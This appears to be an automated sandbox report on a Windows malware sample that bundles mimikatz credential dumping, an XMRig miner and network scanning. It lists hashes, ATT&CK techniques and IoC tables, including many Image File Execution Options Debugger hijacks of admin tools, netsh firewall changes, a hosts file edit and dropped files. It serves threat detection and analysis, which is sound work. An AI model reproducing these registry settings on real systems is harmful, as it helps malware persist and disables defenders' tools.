mimikatz | fc01aecc9e67f37df40f18b8f4537eb11dc2cd1d72ddd6b93c668d524a19d81f

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-09-2024 21:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
Size

8.1MB
MD5

391da25440ef5baab4005f9f2adaee4d
SHA1

0f1ee9c4081d7b644e985575a8d6bdc54421e5eb
SHA256

fc01aecc9e67f37df40f18b8f4537eb11dc2cd1d72ddd6b93c668d524a19d81f
SHA512

ae4b789cc543fe2ed7bb36ac60acbf308123be3bbf5f3808622ac6a577bbabddce125d272c916cc338dccc060c819e28e2c11d73e44bc767a407320517f997c3
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1696 created 1600	1696	bmgkttu.exe	37

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (19513) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/2388-128-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-132-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-147-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-164-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-174-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-187-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-200-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-203-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-206-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig
behavioral2/memory/2388-207-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 4 IoCs

resource	yara_rule
behavioral2/memory/2736-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/2736-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x0009000000023444-6.dat	mimikatz
behavioral2/memory/3288-88-0x00007FF683D50000-0x00007FF683E3E000-memory.dmp	mimikatz

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	bmgkttu.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	bmgkttu.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	bmgkttu.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3580	netsh.exe
4176	netsh.exe

Executes dropped EXE 27 IoCs

pid	Process
4860	bmgkttu.exe
1696	bmgkttu.exe
860	wpcap.exe
4084	tqbingtiu.exe
3288	vfshost.exe
5032	cuinytuyr.exe
3680	xohudmc.exe
1360	umueiy.exe
2388	uyibml.exe
2736	cuinytuyr.exe
3320	cuinytuyr.exe
2232	cuinytuyr.exe
860	cuinytuyr.exe
208	cuinytuyr.exe
4216	cuinytuyr.exe
1964	cuinytuyr.exe
784	cuinytuyr.exe
924	bmgkttu.exe
4444	cuinytuyr.exe
2092	cuinytuyr.exe
2052	cuinytuyr.exe
2536	cuinytuyr.exe
4652	cuinytuyr.exe
3700	cuinytuyr.exe
3556	cuinytuyr.exe
732	abkbubrfy.exe
2852	bmgkttu.exe

Loads dropped DLL 3 IoCs

pid	Process
4084	tqbingtiu.exe
4084	tqbingtiu.exe
4084	tqbingtiu.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023497-85.dat	upx
behavioral2/memory/3288-86-0x00007FF683D50000-0x00007FF683E3E000-memory.dmp	upx
behavioral2/memory/3288-88-0x00007FF683D50000-0x00007FF683E3E000-memory.dmp	upx
behavioral2/files/0x00070000000234a2-91.dat	upx
behavioral2/memory/5032-92-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/5032-100-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/files/0x000700000002349f-114.dat	upx
behavioral2/memory/2388-115-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2736-121-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/3320-125-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-128-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2232-130-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-132-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/860-134-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/208-137-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/4216-141-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/1964-145-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-147-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/784-150-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/4444-158-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2092-162-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-164-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2052-168-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2536-172-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-174-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/4652-177-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/3700-181-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/3556-185-0x00007FF69BA60000-0x00007FF69BABB000-memory.dmp	upx
behavioral2/memory/2388-187-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2388-200-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2388-203-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2388-206-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx
behavioral2/memory/2388-207-0x00007FF7358F0000-0x00007FF735A10000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	ifconfig.me
72	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\umueiy.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	bmgkttu.exe
File created	C:\Windows\SysWOW64\umueiy.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	bmgkttu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	bmgkttu.exe

Drops file in Windows directory 59 IoCs

description	ioc	Process
File opened for modification	C:\Windows\kunylkua\vimpcsvc.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\Corporate\mimidrv.sys	bmgkttu.exe
File created	C:\Windows\ime\bmgkttu.exe	bmgkttu.exe
File created	C:\Windows\kunylkua\bmgkttu.exe	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\tibe-2.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\upbdrjv\swrpwe.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\AppCapture32.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\trfo-2.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\schoedcl.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\wpcap.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\docmicfg.xml	bmgkttu.exe
File created	C:\Windows\kunylkua\schoedcl.xml	bmgkttu.exe
File opened for modification	C:\Windows\kunylkua\docmicfg.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\AppCapture64.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\Corporate\vfshost.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\Corporate\mimilib.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\Packet.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\libxml2.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\tucl-1.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\spoolsrv.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\wpcap.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\ucl.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\svschost.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\spoolsrv.xml	bmgkttu.exe
File created	C:\Windows\kunylkua\docmicfg.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\ip.txt	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\posh-0.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\ssleay32.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\docmicfg.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\abkbubrfy.exe	bmgkttu.exe
File opened for modification	C:\Windows\kunylkua\bmgkttu.exe	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\kunylkua\svschost.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\trch-1.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\spoolsrv.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\schoedcl.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\svschost.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\vimpcsvc.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\docmicfg.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\cnli-1.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\xdvl-0.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\vimpcsvc.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\schoedcl.exe	bmgkttu.exe
File opened for modification	C:\Windows\kunylkua\schoedcl.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\coli-0.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\exma-1.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\svschost.xml	bmgkttu.exe
File opened for modification	C:\Windows\lntufbicv\Corporate\log.txt	cmd.exe
File created	C:\Windows\lntufbicv\nibkahlsb\scan.bat	bmgkttu.exe
File created	C:\Windows\lntufbicv\nibkahlsb\tqbingtiu.exe	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\libeay32.dll	bmgkttu.exe
File created	C:\Windows\kunylkua\svschost.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\Shellcode.ini	bmgkttu.exe
File opened for modification	C:\Windows\lntufbicv\nibkahlsb\Packet.dll	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\vimpcsvc.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\zlib1.dll	bmgkttu.exe
File created	C:\Windows\kunylkua\spoolsrv.xml	bmgkttu.exe
File created	C:\Windows\kunylkua\vimpcsvc.xml	bmgkttu.exe
File opened for modification	C:\Windows\kunylkua\spoolsrv.xml	bmgkttu.exe
File created	C:\Windows\lntufbicv\UnattendGC\specials\crli-0.dll	bmgkttu.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1420	sc.exe
540	sc.exe
3312	sc.exe
3788	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
